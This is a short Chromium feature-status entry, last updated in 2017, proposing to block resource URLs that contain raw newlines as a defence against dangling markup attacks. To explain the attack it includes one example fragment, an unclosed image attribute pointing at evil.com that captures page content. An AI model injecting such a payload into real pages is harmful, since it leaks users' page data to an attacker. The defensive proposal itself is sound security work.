Resources whose URLs contain raw newline characters.

As discussed in https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/rOs6YRyBEpw/D3pzVwGJAgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.

Specification

Editor's draft

Status in Chromium

Proposed (launch bug)

Consensus & Standardization

  • No public signals
  • No public signals
  • No public signals
  • No signals

Owner

Last updated on 2017-03-28